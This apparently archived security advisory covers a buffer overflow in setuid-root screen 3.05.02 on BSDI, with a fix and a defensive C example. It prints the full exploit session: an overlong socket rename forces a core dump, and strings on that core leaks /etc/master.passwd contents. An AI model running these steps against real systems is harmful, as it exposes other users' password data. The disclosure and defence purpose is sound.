COMMAND

    /usr/contrib/bin/screen

SYSTEMS AFFECTED

    BSDI

PROBLEM

    Khelbin Sunvold posted the following. The program under question is
    /usr/contrib/bin/screen (BSDI). This is screen version 3.05.02 and is
    installed setuid root, as it is "supposed" to be. Here is a
    demonstration:

        $ screen
        Screen version 3.05.02 (FAU) 19-Aug-93
        Copyright (c) 1993 Juergen Weigert, Michael Schroeder
        Copyright (c) 1987 Oliver Laumann
        [snip boring messages]
        [Press Space or Return to end.]
        $ screen
        $ cd /tmp/screens/S-khelbin
        $ ls
        246.ttyp7.comet
        $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
        $ screen -ls
        /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
        %1 278 Abort - core dumped screen -ls
        $ ls -l
        total 176
        srwx------ 1 khelbin khelbin 0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
        -rw-r--r-- 1 khelbin khelbin 172032 Feb 15 21:33 core.screen
        $ strings core.screen|less

    The core.screen file contains unencrypted password strings from
    /etc/master.passwd, which, of course, should not be readable by me.

SOLUTION

    chmod -s /usr/contrib/bin/screen while using the old version. There
    were several buffer overflows in old versions of screen; the latest
    version is 3.7.2, available from
    ftp://prep.ai.mit.edu/pub/gnu/screen-3.7.2.tar.gz. The overflows have
    been fixed for a long time now, and I was unable to reproduce the core
    dump on Linux with screen 3.07.01.
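The two defenses a setuid program needs against the failure shown above, as an added example that is not screen's own code: disable core files before touching privileged data, and length-check a user-controlled socket name before it reaches a fixed-size buffer. The page does not say which buffer in screen overflowed, so `sun_path` is used here as an assumed stand-in; `disable_core_dumps`, `build_socket_addr` and the `S-user` directory are hypothetical names.

```c
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Turn off core files for this process. A setuid program calls this first,
 * before it reads anything privileged into memory. Returns 0 on success. */
int disable_core_dumps(void)
{
    struct rlimit none = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &none);
}

/* Build the address for socket "name" inside "dir". The name comes from a
 * user-writable directory, so its length is user-controlled: refuse
 * anything that does not fit sun_path instead of copying it blindly.
 * Returns 0 on success, -1 if name is empty, contains '/', or is too long. */
int build_socket_addr(struct sockaddr_un *addr, const char *dir, const char *name)
{
    int n;

    if (name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;
    memset(addr, 0, sizeof(*addr));
    addr->sun_family = AF_UNIX;
    n = snprintf(addr->sun_path, sizeof(addr->sun_path), "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= sizeof(addr->sun_path)) {
        memset(addr, 0, sizeof(*addr)); /* never hand back a truncated path */
        return -1;
    }
    return 0;
}

int main(void)
{
    struct sockaddr_un addr;
    char long_name[256]; /* constructed: stands in for the renamed socket */

    memset(long_name, 'a', sizeof(long_name) - 1);
    long_name[sizeof(long_name) - 1] = '\0';
    if (disable_core_dumps() != 0)
        perror("setrlimit");
    printf("short name: %d\n", build_socket_addr(&addr, "/tmp/screens/S-user", "246.ttyp7.comet"));
    printf("long name:  %d\n", build_socket_addr(&addr, "/tmp/screens/S-user", long_name));
    return 0;
}
```

With core files disabled, a crash in the privileged process leaves nothing on disk for `strings` to read, whatever its cause.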